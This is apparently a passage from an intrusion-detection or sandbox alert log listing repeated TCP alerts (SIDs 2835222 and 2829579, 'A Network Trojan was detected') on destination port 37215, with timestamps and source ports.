          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271042
          SID:2835222
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680711
          SID:2835222
          Source Port:46110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820215
          SID:2829579
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.245230
          SID:2835222
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283770
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713528
          SID:2829579
          Source Port:46218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666969
          SID:2835222
          Source Port:33306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683216
          SID:2829579
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241737
          SID:2835222
          Source Port:41184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017743
          SID:2835222
          Source Port:47936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330135
          SID:2835222
          Source Port:57468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269685
          SID:2835222
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300874
          SID:2829579
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804596
          SID:2829579
          Source Port:48774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017430
          SID:2835222
          Source Port:43980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066613
          SID:2835222
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511212
          SID:2835222
          Source Port:45854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527052
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298281
          SID:2835222
          Source Port:36550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980784
          SID:2829579
          Source Port:50096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225954
          SID:2829579
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958803
          SID:2829579
          Source Port:37946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484942
          SID:2835222
          Source Port:37016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.303811
          SID:2835222
          Source Port:33282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131632
          SID:2835222
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669121
          SID:2829579
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.060936
          SID:2829579
          Source Port:34734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656683
          SID:2829579
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597632
          SID:2835222
          Source Port:34340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782919
          SID:2829579
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230056
          SID:2835222
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927796
          SID:2829579
          Source Port:53472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.300029
          SID:2829579
          Source Port:45990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680117
          SID:2835222
          Source Port:58862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709041
          SID:2835222
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.285108
          SID:2829579
          Source Port:52078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332321
          SID:2829579
          Source Port:39336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339649
          SID:2829579
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009924
          SID:2829579
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269817
          SID:2829579
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125274
          SID:2829579
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339325
          SID:2829579
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102968
          SID:2835222
          Source Port:56764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678340
          SID:2829579
          Source Port:59092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177258
          SID:2829579
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279694
          SID:2829579
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217181
          SID:2835222
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273487
          SID:2829579
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316439
          SID:2829579
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551118
          SID:2829579
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994913
          SID:2829579
          Source Port:60110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124600
          SID:2835222
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299188
          SID:2829579
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144857
          SID:2835222
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595350
          SID:2829579
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497173
          SID:2835222
          Source Port:51630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271389
          SID:2829579
          Source Port:45792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927819
          SID:2835222
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084367
          SID:2835222
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.985484
          SID:2829579
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497531
          SID:2829579
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946702
          SID:2829579
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291408
          SID:2829579
          Source Port:58526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742324
          SID:2835222
          Source Port:43270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959712
          SID:2835222
          Source Port:55664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.792521
          SID:2829579
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017622
          SID:2829579
          Source Port:40314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852007
          SID:2835222
          Source Port:41252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268598
          SID:2835222
          Source Port:55960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187076
          SID:2835222
          Source Port:59382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547582
          SID:2829579
          Source Port:60888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562807
          SID:2829579
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142613
          SID:2829579
          Source Port:57648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655892
          SID:2835222
          Source Port:45744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328900
          SID:2835222
          Source Port:49190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462515
          SID:2829579
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985143
          SID:2829579
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402374
          SID:2835222
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322882
          SID:2829579
          Source Port:42118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161951
          SID:2829579
          Source Port:35740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511927
          SID:2829579
          Source Port:52530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201835
          SID:2829579
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227587
          SID:2829579
          Source Port:51620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689296
          SID:2829579
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475745
          SID:2835222
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281841
          SID:2829579
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339937
          SID:2829579
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803856
          SID:2829579
          Source Port:55578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938468
          SID:2829579
          Source Port:38274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547288
          SID:2829579
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727526
          SID:2829579
          Source Port:47378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301150
          SID:2829579
          Source Port:44532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215815
          SID:2829579
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087879
          SID:2829579
          Source Port:55016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089707
          SID:2835222
          Source Port:39028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553693
          SID:2835222
          Source Port:53508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048638
          SID:2829579
          Source Port:52940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529075
          SID:2829579
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123858
          SID:2835222
          Source Port:37400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726954
          SID:2835222
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296038
          SID:2829579
          Source Port:53964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710667
          SID:2835222
          Source Port:44184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859665
          SID:2835222
          Source Port:38280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156443
          SID:2829579
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744729
          SID:2829579
          Source Port:55730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892946
          SID:2835222
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473276
          SID:2829579
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657083
          SID:2829579
          Source Port:44716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217132
          SID:2835222
          Source Port:33126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665889
          SID:2835222
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.614799
          SID:2835222
          Source Port:54324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630777
          SID:2835222
          Source Port:46018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944005
          SID:2829579
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554473
          SID:2835222
          Source Port:56936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808224
          SID:2829579
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.952012
          SID:2829579
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855517
          SID:2835222
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953063
          SID:2829579
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977575
          SID:2829579
          Source Port:54362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341831
          SID:2835222
          Source Port:39788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215545
          SID:2835222
          Source Port:36526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742236
          SID:2835222
          Source Port:41326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511647
          SID:2835222
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073943
          SID:2835222
          Source Port:40492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160342
          SID:2829579
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743674
          SID:2829579
          Source Port:59444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338485
          SID:2835222
          Source Port:59786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146158
          SID:2829579
          Source Port:40702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145254
          SID:2835222
          Source Port:36930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939596
          SID:2829579
          Source Port:57208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040762
          SID:2835222
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549242
          SID:2835222
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618756
          SID:2829579
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229408
          SID:2835222
          Source Port:44160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691972
          SID:2835222
          Source Port:39202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817657
          SID:2835222
          Source Port:48006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146276
          SID:2835222
          Source Port:47532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671874
          SID:2835222
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208415
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888395
          SID:2835222
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434516
          SID:2829579
          Source Port:47054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562568
          SID:2835222
          Source Port:57106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815671
          SID:2829579
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768505
          SID:2835222
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921119
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178096
          SID:2835222
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172585
          SID:2829579
          Source Port:37460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332656
          SID:2829579
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932150
          SID:2829579
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975173
          SID:2835222
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202093
          SID:2835222
          Source Port:35786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202189
          SID:2835222
          Source Port:57580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595110
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174574
          SID:2829579
          Source Port:55692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214278
          SID:2835222
          Source Port:41930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846361
          SID:2835222
          Source Port:45502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794375
          SID:2835222
          Source Port:47684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482127
          SID:2835222
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.091034
          SID:2829579
          Source Port:57106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042047
          SID:2829579
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322152
          SID:2835222
          Source Port:42736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560577
          SID:2835222
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039344
          SID:2835222
          Source Port:49874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493002
          SID:2835222
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283565
          SID:2835222
          Source Port:41896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186218
          SID:2835222
          Source Port:57536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077729
          SID:2829579
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224152
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.951912
          SID:2829579
          Source Port:51400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476387
          SID:2835222
          Source Port:42004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224685
          SID:2829579
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962704
          SID:2835222
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472075
          SID:2835222
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008800
          SID:2835222
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857746
          SID:2835222
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527096
          SID:2835222
          Source Port:41380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970148
          SID:2829579
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711119
          SID:2835222
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171288
          SID:2835222
          Source Port:40044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636309
          SID:2835222
          Source Port:51750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866694
          SID:2835222
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066556
          SID:2835222
          Source Port:39342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543487
          SID:2835222
          Source Port:39494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478296
          SID:2829579
          Source Port:56906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470794
          SID:2829579
          Source Port:44178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560515
          SID:2829579
          Source Port:58154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230483
          SID:2829579
          Source Port:46634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650238
          SID:2835222
          Source Port:59358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651110
          SID:2829579
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891910
          SID:2829579
          Source Port:38776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177301
          SID:2835222
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186186
          SID:2829579
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965184
          SID:2835222
          Source Port:54786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270843
          SID:2835222
          Source Port:34828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283649
          SID:2829579
          Source Port:36456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723881
          SID:2835222
          Source Port:36428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426509
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
